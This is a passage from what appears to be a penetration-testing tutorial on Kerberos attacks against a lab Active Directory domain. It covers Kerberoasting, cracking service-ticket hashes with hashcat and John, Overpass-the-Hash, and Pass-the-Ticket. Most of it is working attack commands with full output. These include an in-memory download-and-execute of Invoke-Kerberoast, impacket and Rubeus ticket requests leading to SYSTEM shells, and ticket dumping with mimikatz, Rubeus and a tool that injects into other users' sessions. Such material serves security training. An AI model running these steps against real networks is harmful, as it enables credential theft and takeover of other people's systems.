$krb5tgs$23$*$jurassic.park$cloner\/labwws02*$60B2E176B7A641FD663BF1B8D0B6E106$069B2ACA38B73BFCAC56526DBAEF743F4981980CD213DD9FE7D41D3AB3F3E521273C70D9CA681319F690C5BFAE627B423D3FBAD20D7EDE8E1AF930B5AEFCC2657B4A8B0BD5DCD9B51560E78478A9A7616C0CB675FDC501828CCE58206542D48D48B4A1DCE61BDCB9705094DE1D16536526E04E5AE84567407DA665868E33DB26CD763DCEBDD8F6801494A9F6E3ADE8F63C7D197D1AE66345A9635FE5E7C2D35A9DC4885DD2C6699CE8C00D71B518DC6BA8B87F525AEC635881245F20E7ECE150B4D4223C19960AFF417FB4C053EA6FA3B86938FCA1F1A781E3F36FAB9EE8909422CCE440453F0E3A2D23DED7861BA919BC8567C6DC1F77817F1E44181783EC3BA76CF688A841FBD6F9B02B2BD2D4A22BB489808F04CAAA87D025812EF11B39FEC605485EB875D57F4D09623B3108638816E6D2DB81F280635B29FD4BD08A9C8AAE72571B61E81274C56DCAB8AE13C2EEFA3AF2DD4084A96CA84F336987CD765C2D23FB957EE378136ED42BBFDE1DE8361BF933B51370D7AF07A3A939C3FEEC62ADC4A884EE52A296DEF9402F732D57F04FB93FC296B8F5031FA852403D6AE7211648693C4CD0C47847C07E869D1FB41B627B1928EC929409EEE0B1CE67BB55CEA069A26809E8347A3BEA34AB9EC4F78051D40CCD9AB1C5AF655165F86E0185B72E01643854710E322A2722BDEAABA317A1ECD78096E3D5A51831A57F505B861AEEB9B2207CA2D7FBCE47847C3D3A1CB9D5C2B931BC532B220434550D83A82F63B26B918E189C38D7D979AC05D34043ECEDCA09CEFDB3065A8BE2717E84FC325373A7B778AA4325D7F0458AC7A84196DA7752BEFE0ED9A0830ECB60BA4F3EC5F0A2FB3BA482DD9F947C8A667CCC54013C01D15E0AB41CC08A140389028461B16E38CCD85542F8B53E1AC4CB4E8F6CE2EFC9ECDABD6AED2716C17221791D620E333359B39A0D6720FD6167A2D03A74B4C7FD549EC9169AC3103A4EBD9BF8F5754EF013411802524A5F8DA6FE7FBCD219D2193891C9026513AEB751D6D3707253929F43F6A40012E2463002465F888E6F15C4CE264DB88650D503431A3D1FC58321ADB65F7BC69E2E95562A81FFE3A633BF4AC27B85CE2CB49A0EF19FDA1A51074B898D21B94FA91F7092BE9B22BDFBA09829FC1B95187AE8CB2BBAB3C1E3ECF5835723C2858862A0BEF32001AC461C0FE496029B3E7E6827E0991F6CF3F6D658F4AA8DDDDC097CC2B12038DF8112833DA052D0ED2D42D2FD93DA13FFEE3831F57956DFF6FA0C9E573862B1D4F2AC3344F7320F1FBCB5F9773EEE0F091829052CC5F31CECBD0E468914C70B9F03CA056A53E449AE85734B1C43D57FEEFC5576672C82D47F14A168E9A2FFDE715955B2749A01DE174CB32C4D8F7477A087E717379D9599E50997D8619D8F1F2DB268E5D89A9DA13E2B61C15E97159740766C4415B5F46C754A2C2C9500092BD1AF88F1C1C4D5DC4A4F5078F691148D448DBCD94549F74A2312921293427891DEF1C0754FA6AA3633141BE8D885703279C62EECE474A366FC9B8C8A4A5DAF98FF    Another way to accomplish Kerberoast is to use the powershell script Invoke-Kerberoast from Empire project, which can be loaded directly into memory:  PS C:\\Users\\triceratops&gt; iex (new-object Net.WebClient).DownloadString(\"https:\/\/raw.githubusercontent.com\/EmpireProject\/Empire\/master\/data\/module_source\/credentials\/Invoke-Kerberoast.ps1\")  PS C:\\Users\\triceratops&gt; Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast    In the same way as impacket, these tools create output files with one crackable TGS per line, which can be used to feed Hashcat or John.  Cracking the TGSs  In this section, cracking examples of both Hashcat and John will be shown. However, there are several different cracking methods which can be applied in this situation. Next, a dictionary attack will be performed (the dictionary contains the password for demonstration purposes).    Hashcat command:  root@kali:impacket-examples# hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt   hashcat (v5.1.0) starting...    OpenCL Platform #1: The pocl project    * Device #1: pthread-Intel(R) Core(TM) i5-4210H CPU @ 2.90GHz, 2961\/2961 MB allocatable, 2MCU    Hashes: 1 digests; 1 unique digests, 1 unique salts  Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5\/13 rotates  Rules: 1    Applicable optimizers:  * Zero-Byte  * Not-Iterated  * Single-Hash  * Single-Salt    Minimum password length supported by kernel: 0  Maximum password length supported by kernel: 256    ATTENTION! Pure (unoptimized) OpenCL kernels selected.  This enables cracking passwords and salts &gt; length 32 but for the price of drastically reduced performance.  If you want to switch to optimized OpenCL kernels, append -O to your commandline.    Watchdog: Hardware monitoring interface not found on your system.  Watchdog: Temperature abort trigger disabled.    * Device #1: build_opts '-cl-stdCL1.2 -I OpenCL -I \/usr\/share\/hashcat\/OpenCL -D LOCAL_MEM_TYPE2 -D VENDOR_ID64 -D CUDA_ARCH0 -D AMD_ROCM0 -D VECT_SIZE4 -D DEVICE_TYPE2 -D DGST_R00 -D DGST_R11 -D DGST_R22 -D DGST_R33 -D DGST_ELEM4 -D KERN_TYPE13100 -D _unroll'  * Device #1: Kernel m13100_a0-pure.43809ab0.kernel not found in cache! Building may take a while...  Dictionary cache hit:  * Filename..: passwords_kerb.txt  * Passwords.: 3  * Bytes.....: 25  * Keyspace..: 3    The wordlist or mask that you are using is too small.  This means that hashcat cannot use the full parallel power of your device(s).  Unless you supply more work, your cracking speed will drop.  For tips on supplying more work, see: https:\/\/hashcat.net\/faq\/morework    Approaching final keyspace - workload adjusted.      $krb5tgs$23$*velociraptor$jurassic.park$cloner\/labwws02*$60b2e176b7a641fd663bf1b8d0b6e106$069b2aca38b73bfcac56526dbaef743f4981980cd213dd9fe7d41d3ab3f3e521273c70d9ca681319f690c5bfae627b423d3fbad20d7ede8e1af930b5aefcc2657b4a8b0bd5dcd9b51560e78478a9a7616c0cb675fdc501828cce58206542d48d48b4a1dce61bdcb9705094de1d16536526e04e5ae84567407da665868e33db26cd763dcebdd8f6801494a9f6e3ade8f63c7d197d1ae66345a9635fe5e7c2d35a9dc4885dd2c6699ce8c00d71b518dc6ba8b87f525aec635881245f20e7ece150b4d4223c19960aff417fb4c053ea6fa3b86938fca1f1a781e3f36fab9ee8909422cce440453f0e3a2d23ded7861ba919bc8567c6dc1f77817f1e44181783ec3ba76cf688a841fbd6f9b02b2bd2d4a22bb489808f04caaa87d025812ef11b39fec605485eb875d57f4d09623b3108638816e6d2db81f280635b29fd4bd08a9c8aae72571b61e81274c56dcab8ae13c2eefa3af2dd4084a96ca84f336987cd765c2d23fb957ee378136ed42bbfde1de8361bf933b51370d7af07a3a939c3feec62adc4a884ee52a296def9402f732d57f04fb93fc296b8f5031fa852403d6ae7211648693c4cd0c47847c07e869d1fb41b627b1928ec929409eee0b1ce67bb55cea069a26809e8347a3bea34ab9ec4f78051d40ccd9ab1c5af655165f86e0185b72e01643854710e322a2722bdeaaba317a1ecd78096e3d5a51831a57f505b861aeeb9b2207ca2d7fbce47847c3d3a1cb9d5c2b931bc532b220434550d83a82f63b26b918e189c38d7d979ac05d34043ecedca09cefdb3065a8be2717e84fc325373a7b778aa4325d7f0458ac7a84196da7752befe0ed9a0830ecb60ba4f3ec5f0a2fb3ba482dd9f947c8a667ccc54013c01d15e0ab41cc08a140389028461b16e38ccd85542f8b53e1ac4cb4e8f6ce2efc9ecdabd6aed2716c17221791d620e333359b39a0d6720fd6167a2d03a74b4c7fd549ec9169ac3103a4ebd9bf8f5754ef013411802524a5f8da6fe7fbcd219d2193891c9026513aeb751d6d3707253929f43f6a40012e2463002465f888e6f15c4ce264db88650d503431a3d1fc58321adb65f7bc69e2e95562a81ffe3a633bf4ac27b85ce2cb49a0ef19fda1a51074b898d21b94fa91f7092be9b22bdfba09829fc1b95187ae8cb2bbab3c1e3ecf5835723c2858862a0bef32001ac461c0fe496029b3e7e6827e0991f6cf3f6d658f4aa8ddddc097cc2b12038df8112833da052d0ed2d42d2fd93da13ffee3831f57956dff6fa0c9e573862b1d4f2ac3344f7320f1fbcb5f9773eee0f091829052cc5f31cecbd0e468914c70b9f03ca056a53e449ae85734b1c43d57feefc5576672c82d47f14a168e9a2ffde715955b2749a01de174cb32c4d8f7477a087e717379d9599e50997d8619d8f1f2db268e5d89a9da13e2b61c15e97159740766c4415b5f46c754a2c2c9500092bd1af88f1c1c4d5dc4a4f5078f691148d448dbcd94549f74a2312921293427891def1c0754fa6aa3633141be8d885703279c62eece474a366fc9b8c8a4a5daf98ff:Sm4rtSp33d                                                     Session..........: hashcat  Status...........: Cracked  Hash.Type........: Kerberos 5 TGS-REP etype 23  Hash.Target......: $krb5tgs$23$*velociraptor$jurassic.park$cloner\/labw...af98ff  Time.Started.....: Tue Mar  5 10:46:34 2019 (1 sec)  Time.Estimated...: Tue Mar  5 10:46:35 2019 (0 secs)  Guess.Base.......: File (passwords_kerb.txt)  Guess.Queue......: 1\/1 (100.00%)  Speed.#1.........:        4 H\/s (0.16ms) @ Accel:64 Loops:1 Thr:64 Vec:4  Recovered........: 1\/1 (100.00%) Digests, 1\/1 (100.00%) Salts  Progress.........: 3\/3 (100.00%)  Rejected.........: 0\/3 (0.00%)  Restore.Point....: 0\/3 (0.00%)  Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1  Candidates.#1....: above1 -&gt; below1    Started: Tue Mar  5 10:42:51 2019  Stopped: Tue Mar  5 10:46:35 2019    Due to encoding while using hashcat, a problem raised. The tool displays an error similar to Byte Order Mark (BOM) was detected, due to an input file encoded with Unicode (which is common in Windows output files) instead of ASCII. In order to solve this issue, the tool dos2unix can be used to convert the file encoding to the correct one.    John command:  root@kali:impacket-examples# john --formatkrb5tgs --wordlistpasswords_kerb.txt hashes.kerberoast  Using default input encoding: UTF-8  Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 )  Will run 2 OpenMP threads  Press 'q' or Ctrl-C to abort, almost any other key for status  Sm4rtSp33d       (?)  1g 0:00:00:00 DONE (2019-03-05 10:53) 50.00g\/s 150.0p\/s 150.0c\/s 150.0C\/s above1..below1  Use the \"--show\" option to display all of the cracked passwords reliably  Session completed    John was not able to show the username alongside the cracked password, instead, it displayed the symbol (?). While this is enough in the case of just one TGS, it can get pretty annoying if several are going to be cracked.    After all, as shown above, it was possible to crack the password by using the correct dictionary with both tools.      Overpass The Hash\/Pass The Key (PTK)  This attack aims to use user NTLM hash to request Kerberos tickets, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially useful in networks where NTLM protocol is disabled and only Kerberos is allowed as authentication protocol.    In order to perform this attack, the NTLM hash (or password) of the target user account is needed. Thus, once a user hash is obtained, a TGT can be requested for that account. Finally, it is possible to access any service or machine where the user account has permissions.  From Linux  From a Linux perspective, impacket can be used in order to perform this attack. Thus, the commands required for that purpose are the following:  root@kali:impacket-examples# python getTGT.py jurassic.park\/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     Saving ticket in velociraptor.ccache  root@kali:impacket-examples# export KRB5CCNAME\/root\/impacket-examples\/velociraptor.ccache  root@kali:impacket-examples# python psexec.py jurassic.park\/velociraptor@labwws02.jurassic.park -k -no-pass  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     Requesting shares on labwws02.jurassic.park.....   Found writable share ADMIN$   Uploading file yuiQeOUk.exe   Opening SVCManager on labwws02.jurassic.park.....   Creating service sBGq on labwws02.jurassic.park.....   Starting service sBGq.....   Press help for extra shell commands  Microsoft Windows   Copyright (c) 2009 Microsoft Corporation. All rights reserved.    C:\\Windows\\system32&gt;whoami  nt authority\\system    C:\\Windows\\system32&gt;    After generating and using the TGT, finally a shell is launched. The requested TGT can also be used with other impacket examples with parameter -k, and even with other tools (as smbexec.py or wmiexec.py) thanks to it being written in a ccache file, which is a widely used format for Kerberos tickets in Linux.    At the moment of writing the examples for this article some problems arised:     \tPyAsn1Error('NamedTypes can cast only scalar values',) : Resolved by updating impacket to the lastest version.   \tKDC can't found the name : Resolved by using the hostname instead of the IP address, because it was not recognized by Kerberos KDC.    From Windows  In order to accomplish this attack from a Windows machine, it is possible to use Rubeus and PsExec as follows:  C:\\Users\\triceratops&gt;.\\Rubeus.exe asktgt \/domain:jurassic.park \/user:velociraptor \/rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 \/ptt       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.3.3     Action: Ask TGT     Using rc4_hmac hash: 2a3de7fe356ee524cc9f3d579f2e0aa7   Using domain controller: Lab-WDC02.jurassic.park (10.200.220.3)   Building AS-REQ (w\/ preauth) for: 'jurassic.park\\velociraptor'   Connecting to 10.200.220.3:88   Sent 237 bytes   Received 1455 bytes   TGT request successful!   base64(ticket.kirbi):          doIFSDCCBUSgAwIBBaEDAgEWooIEVjCCBFJhggROMIIESqADAgEFoQ8bDUpVUkFTU0lDLlBBUkuiIjAg        oAMCAQKhGTAXGwZrcmJ0Z3QbDWp1cmFzc2ljLnBhcmujggQMMIIECKADAgESoQMCAQKiggP6BIID9nUy        VTaRmuyCOYJ\/Fz0Z5We4crR6qWrxpEPDZHV09VmBp0GYWwUxwGM4M2hkbFJss6i0RG1NvKUy55D2loPI        nKXSD5kwEjJeMsVAQWvvQCNuIrVu\/XY9eGhL405ryVYNELdPxOuBNXYYZoQYLo1qxcoEkH\/ag4QTnG7z        6qH1o5RWwhmqMHNWp77LGu3lBWd0lb3t7d3pfGCU7hgWRvA390dQZ+Vzrcqfs5sHzoii8ondT9LqyvYI        4P6DwhXH1wWOVhF9Sf23wUSG5iIZvbTrHuNZvFcPmUYXF2zd0Dtx+L3ovYdWaw+7HDmu4NPspvuAlG2x        Jj\/cbGS1KuCjAtSkT9XMVu0WEFY8gIbew35l8t5H7b+8fcjTyOLFJyMIuEzTjdfzdGJ8NYsqAxG0wCtd        w4OCuqUUHuffwD4L27PC+fVVR7D5htfy6MbWVQrVqfgGIhqdC68I5COjyknobf+ksO9EDcn8+7zDUXtE        dbt9XZtt0VTNyZUfSyOMGW+pkpB8wA3QjzahpgrLVE\/8oHGAkFQ6sf\/DOr0CYinn7iC8lJ1zZj1hcDa6        Y+RVSARW4V++03uQPwtCN6mpuhIumikFCQsOTMQky8QKcsFGHdsCqySQsAoOtdWLHpuYFnaA0VDb3M+i        4yc5286jaF6NRRPBZJEZnSTCRNwhJCR3bgO3C5bzWKFCOFMjFy5GOCZoZdYIbKiVABG2ZFUuyMedCDQQ        YJrLO6oFoCL5Yeu2vrviFZUSpbUVZlxSDHnASuo1PUCfnm7oF3E6aw6\/Q\/0\/dONSQzImXC7H+t2Z7ym5        4pIzkgIZ\/p5ODWfKr\/XrrBUjmPPDzGyRUz9q1NKPv0SVi8sC5wkWAe1tipU5G582PrBWuS+Nv9XLAoKL        +LR4iWnUw3o3\/96IyCiHiCGy\/g1DLJehxb5\/wxDxwrnpDW50kFs7bwFrbD+8qWwd8apZF\/iiUyzRYJAu        jDOTyfJtZ7Vm2mOwSm1KeUboZ3u9StIkNUbmjR\/wXvwmvUCXDppO\/LeMT9w5uejGNVr+QRLPL+brAkbB        GHFoSTR0\/L6k1+8vkJzAJCOA3Yir3JJd8xRdnad4Q7Pl67CjsGKrJddt6iBzoHKPabQ\/SbDVIV4veMX7        5KtcYHM8E2CvV2sV8KD1QIOSo00Ya\/C\/EUekjWsG3YGW7UulxDwb95mDRf6ntr7jMBC8G2jd49IuJcWR        QTDFuys4L\/NsEAqLo5RPNk6bz1SpjpWlmG95hRg5DAe1M+u8aRD6NDs3A8fH6b7fZkQ+1I\/Xl5sBhfTt        7FGbTI4mG+VlEHbJpl47KTAO+jJgYj3m0\/vgcwBlO4lCMFucB3B488VEamPJU3M66hMOy6OB3TCB2qAD        AgEAooHSBIHPfYHMMIHJoIHGMIHDMIHAoBswGaADAgEXoRIEEFg+Y8LhMIWpLiabLQKBdBihDxsNSlVS        QVNTSUMuUEFSS6IZMBegAwIBAaEQMA4bDHZlbG9jaXJhcHRvcqMHAwUAQOEAAKURGA8yMDE5MDIyODEx        NTc1N1qmERgPMjAxOTAyMjgyMTU3NTdapxEYDzIwMTkwMzA3MTE1NzU3WqgPGw1KVVJBU1NJQy5QQVJL        qSIwIKADAgECoRkwFxsGa3JidGd0Gw1qdXJhc3NpYy5wYXJr     Action: Import Ticket   Ticket successfully imported!    C:\\Users\\triceratops&gt;.\\PsExec.exe -accepteula \\\\labwws02.jurassic.park cmd    PsExec v2.2 - Execute processes remotely  Copyright (C) 2001-2016 Mark Russinovich  Sysinternals - www.sysinternals.com      Microsoft Windows   Copyright (c) 2009 Microsoft Corporation. All rights reserved.    C:\\Windows\\system32&gt;whoami  jurassic\\velociraptor    C:\\Windows\\system32&gt;    In case of not passing the parameter \/ptt to Rubeus asktgt, the ticket will be shown in base64. The following Powershell command can be used to write it into a file:  ::WriteAllBytes(\"ticket.kirbi\", ::FromBase64String(\"\"))    As this is a little cumbersome, I expect that the program will automatically save the ticket in future versions. After that, the command Rubeus ptt \/ticket: can be used to inject that ticket.      Pass The Ticket (PTT)  This kind of attack is similar to Pass the Key, but instead of using hashes to request for a ticket, the ticket itself is stolen and used to authenticate as its owner. The way of recolecting these tickets changes from Linux to Windows machines, therefore each process will be introduced in its own section.  Harvesting tickets from Linux  On Linux, tickets are stored in credential caches or ccaches. There are 3 main types, which indicate where tickets can be found:     \tFiles, by default under \/tmp directory, in the form of krb5cc_%{uid}.   \tKernel Keyrings, an special space in the Linux kernel provided for storing keys.   \tProcess memory, used when only one process needs to use the tickets.    To verify what type of storage is used in a specific machine, the variable default_ccache_name must be checked in the \/etc\/krb5.conf file, which by default has read permission to any user. In case of this parameter being missing, its default value is FILE:\/tmp\/krb5cc_%{uid}.    Hence, tickets are usually saved in files, which can only be read by the owner and, like any file in Linux, by root. In case of having access to those ticket files, just with copy-pasting them into another machine, they can be used to perform Pass The Ticket attacks.    Example of tickets in a Linux server:  # ls -lah \/tmp\/krb5*  -rw-------. 1 root         root         1.4K Mar  5 16:25 \/tmp\/krb5cc_0  -rw-------. 1 trex         domain users 1.2K Mar  7 10:08 \/tmp\/krb5cc_1120601113_ZFxZpK  -rw-------. 1 velociraptor domain users  490 Mar  7 10:14 \/tmp\/krb5cc_1120601115_uDoEa0    In order to extract tickets from the other 2 sources (keyrings and processes), a great paper, Kerberos Credential Thievery (GNU\/Linux), released in 2017, explains ways of recovering the tickets from them.    Moreover, the paper also contains several scripts to substract tickets from remote machines. In the case of keyrings, their script heracles.sh can be used. In the case of a process holding the tickets, a memory analysis is required to found the tickets inside.    Furthermore, I have developed a tool in C based on the heracles.sh script called tickey, to extract tickets from keyrings. The tool was created because the command keyctl, heavily used by heracles.sh, is not installed by default in Linux systems, so a direct call to the keyctl syscall can solve this problem.    Moreover, tickets in session or user keyrings only can be accesed by the owner user in the same session. Therefore, when tickey is executed as root, it searchs for another user sessions and injects itself in each one of them in order to retrieve those tickets.    An example of tickey output is shown below:  # \/tmp\/tickey -i   krb5 ccache_name  KEYRING:session:sess_%{uid}   root detected, so... DUMP ALL THE TICKETS!!   Trying to inject in trex session...   Successful injection at process 21866 of trex,look for tickets in \/tmp\/__krb_1120601113.ccache   Trying to inject in velociraptor session...   Successful injection at process 20752 of velociraptor,look for tickets in \/tmp\/__krb_1120601115.ccache    Error retrieving tickets  # klist  \/tmp\/__krb_1120601113.ccache  Ticket cache: FILE:\/tmp\/__krb_1120601113.ccache  Default principal: trex@JURASSIC.PARK    Valid starting       Expires              Service principal  05\/09\/2019 15:48:36  05\/10\/2019 01:48:36  krbtgt\/JURASSIC.PARK@JURASSIC.PARK          renew until 05\/10\/2019 15:48:32    Harvesting tickets from Windows  In Windows, tickets are handled and stored by the lsass (Local Security Authority Subsystem Service) process, which is responsible for security. Hence, to retrieve tickets from a Windows system, it is necessary to communicate with lsass and ask for them. As a non-administrative user only owned tickets can be fetched, however, as machine administrator, all of them can be harvested. For this purpose, the tools Mimikatz or Rubeus can be used as shown below:    Mimikatz harvesting:  PS C:\\Users\\velociraptor&gt; .\\mimikatz.exe      .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25   .## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)   ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )   ## \\ \/ ##       &gt; https:\/\/blog.gentilkiwi.com\/mimikatz   '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )    '#####'        &gt; https:\/\/pingcastle.com \/ https:\/\/mysmartlogon.com   ***\/    mimikatz # sekurlsa::tickets \/export    ...  &lt;-----Mimikatz Output-----&gt;  ...    Authentication Id : 0 ; 42211838 (00000000:028419fe)  Session           : RemoteInteractive from 2  User Name         : trex  Domain            : JURASSIC  Logon Server      : LAB-WDC01  Logon Time        : 28\/02\/2019 12:14:43  SID               : S-1-5-21-1339291983-1349129144-367733775-1113             * Username : trex           * Domain   : JURASSIC.PARK           * Password : (null)            Group 0 - Ticket Granting Service                        Start\/End\/MaxRenew: 05\/03\/2019 9:48:37 ; 05\/03\/2019 19:15:59 ; 07\/03\/2019 12:14:43             Service Name (02) : LDAP ; Lab-WDC02.jurassic.park ; jurassic.park ; @ JURASSIC.PARK             Target Name  (02) : LDAP ; Lab-WDC02.jurassic.park ; jurassic.park ; @ JURASSIC.PARK             Client Name  (01) : trex ; @ JURASSIC.PARK ( JURASSIC.PARK )             Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;             Session Key       : 0x00000012 - aes256_hmac               bd16db915bdfb0af3d57509bdea3d92bf8f0ef9976a16ebb6510111597c6d8b6             Ticket            : 0x00000012 - aes256_hmac       ; kvno  4                     * Saved to file -0-0-40a50000-trex@LDAP-Lab-WDC02.jurassic.park.kirbi !            Group 1 - Client Ticket ?            Group 2 - Ticket Granting Ticket                        Start\/End\/MaxRenew: 28\/02\/2019 12:14:43 ; 28\/02\/2019 22:14:43 ; 07\/03\/2019 12:14:43             Service Name (02) : krbtgt ; JURASSIC.PARK ; @ JURASSIC.PARK             Target Name  (--) : @ JURASSIC.PARK             Client Name  (01) : trex ; @ JURASSIC.PARK ( $$Delegation Ticket$$ )             Flags 60a00000    : pre_authent ; renewable ; forwarded ; forwardable ;             Session Key       : 0x00000012 - aes256_hmac               21666ffd3511fb2d1e127ad96e322c3a6e8be644eabba4821ba5c425b4a58842             Ticket            : 0x00000012 - aes256_hmac       ; kvno  2                     * Saved to file -2-0-60a00000-trex@krbtgt-JURASSIC.PARK.kirbi !                        Start\/End\/MaxRenew: 05\/03\/2019 9:15:59 ; 05\/03\/2019 19:15:59 ; 07\/03\/2019 12:14:43             Service Name (02) : krbtgt ; JURASSIC.PARK ; @ JURASSIC.PARK             Target Name  (02) : krbtgt ; JURASSIC.PARK ; @ JURASSIC.PARK             Client Name  (01) : trex ; @ JURASSIC.PARK ( JURASSIC.PARK )             Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;             Session Key       : 0x00000012 - aes256_hmac               f79644af74ade15f4178e5cea3b0ce071b601f78ef4b11c09ed971142dd3bb50             Ticket            : 0x00000012 - aes256_hmac       ; kvno  2                     * Saved to file -2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi !    ...  &lt;-----Mimikatz Output-----&gt;  ...               mimikatz # exit  Bye!    Rubeus harvesting in powershell:  PS C:\\Users\\Administrator&gt; .\\Rubeus dump       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.4.2         Action: Dump Kerberos Ticket Data (All Users)        UserName                 : Administrator    Domain                   : JURASSIC    LogonId                  : 0xdee0cb2    UserSID                  : S-1-5-21-1339291983-1349129144-367733775-500    AuthenticationPackage    : Kerberos    LogonType                : RemoteInteractive    LogonTime                : 07\/03\/2019 12:35:47    LogonServer              : LAB-WDC01    LogonServerDNSDomain     : JURASSIC.PARK    UserPrincipalName        : Administrator@jurassic.park    ...  &lt;-----Rubeus Output-----&gt;  ...        ServiceName              : krbtgt\/JURASSIC.PARK      TargetName               : krbtgt\/jurassic.park      ClientName               : trex      DomainName               : JURASSIC.PARK      TargetDomainName         : JURASSIC.PARK      AltTargetDomainName      : JURASSIC.PARK      SessionKeyType           : aes256_cts_hmac_sha1      Base64SessionKey         : 1gokewLDdgqAnN3a1KNR15q3GaZM3duydjLfb037KLs      KeyExpirationTime        : 01\/01\/1601 1:00:00      TicketFlags              : pre_authent, initial, renewable, forwardable      StartTime                : 07\/03\/2019 16:28:23      EndTime                  : 08\/03\/2019 2:28:23      RenewUntil               : 14\/03\/2019 16:28:23      TimeSkew                 : 0      EncodedTicketSize        : 1284      Base64EncodedTicket      :          doIFADCCBPygAwIBBaEDAgEWooIEBjCCBAJhggP+MIID+qADAgEFoQ8bDUpVUkFTU0lDLlBBUkuiIjAgoAMCAQKhGTAXGwZrcmJ0        Z3QbDUpVUkFTU0lDLlBBUkujggO8MIIDuKADAgESoQMCAQKiggOqBIIDpp9Nm0OTu82mrTl0Tekr8KEF3eX23qxHKcryCuzDV\/Pd        wUNpSc+1Oxa0k2WWvZwa+H9DW4I8fr0BE7oHMs6GaNFEjDJdO\/l0qGUlCwyha05+9lg832SDEERgAA1wQDLjPogyBBTrP5OhGmf0        JevqulePfTUSxXJ\/gNvP6JCQGAf+zUL12dqGkqyq\/\/TOWSQjkgAy3NZtc1Ed3XnfI9L4VUo9YdY5fVSEci7kRm6Mk11sTV7bXSzd        4123fXLA3Usx+xJVKh5JPhvtSyDKRDNdcP2YKPoTyEuKUpsl8KhzbkEpdLPqzR+2uLHNmMzWDdsxTlytzZF9kzB9llUB2C9YLgzD        Qkrx4\/EIDH9w3u3pVVgAmZp1Y9sQhVmI9exIYVSPM\/XA8vPAL1KDGyux+ojkVDAl\/Kezqg6DWtLZO86Rpb7L7LRvk8jX\/4Y4Yi0T        MlsZjahwXn1N3ZulUiF7pvYzh9es9MkS\/X\/YqF6CiDogblLEaFniMYWNYFYMmhjfIZHgX3lyIj8UljRwdeFdt7Ezf\/pmP1rl5uON        hMlagv+prw4UcvN2u4Yeb+ybXMisMH4xonJIBr7\/MKEhmbHVmKuoT+LBMjfN7iChY82rPqbKW0J+nn4yvC3zjLlOC5HNSTdMgGV5        FSAY34RO3SCOe14jetHmq9OQ5rLO5ymWfet5jcYy+ShtrYoNTxEPodNZyFqrBDT4JZ6T9jgoYMIu+g3VcoCRN5XDUJM+tBzZ6QUu        91D0ULl3wdvbEhh89hPAy1AHEWLtAth55\/CJ0kNpWLPvLLz34OLzNg8nzCG2x9mFVP4MKvUw4JJN3LSkYRrxIg5eehSuQul43ZqQ        hxi\/+OyRoVwSfqqMeYO2QSeADaIiaFTwWaIDAu0pr1Vk+XfJGuHUWBjRocHu3dasPMhGoRlV5ehHxc58gnJ6UzkfcVDV7j1Skn7e        os6wa6ejFOrMKNSB+cBqBcvBMCCksHsnQSd4gxUiw\/7Masc9M+f9Xi3vf+f0LyiSKDdUIDOekMh\/RqQhGs9UKSjp6\/Q7EhMCd90J        UDGbwBQZhTOBZApdo1VQ609kXfv654RSZ1OzSgaaK6P0GJdJGJ5NGIuNl1n0oEOZVB0FfATLH\/xC9uD97VkH2mQ8jnFHHxseUle2        qMhkG+NsLOD7c2c9pzUNEbc4EZEjwMFx4eJwEeLnpXOMOMS6ix1YMuZjof6Q8xNmq05vpNMAOScgV7d3QmMvJLNy6LB6gBKPPBqG        4kCjgeUwgeKgAwIBAKKB2gSB132B1DCB0aCBzjCByzCByKArMCmgAwIBEqEiBCDWCiR7AsN2CoCc3drUo1HXmrcZpkzd27J2Mt9v        Tfsou6EPGw1KVVJBU1NJQy5QQVJLohEwD6ADAgEBoQgwBhsEdHJleKMHAwUAQOAAAKURGA8yMDE5MDMwNzE1MjgyM1qmERgPMjAx        OTAzMDgwMTI4MjNapxEYDzIwMTkwMzE0MTUyODIzWqgPGw1KVVJBU1NJQy5QQVJLqSIwIKADAgECoRkwFxsGa3JidGd0Gw1KVVJB        U1NJQy5QQVJL      ...  &lt;-----Rubeus Output-----&gt;  ...     Enumerated 23 total tickets   Extracted  23 total tickets    PS C:\\Users\\Administrator&gt; ::WriteAllBytes(\"ticket.kirbi\", 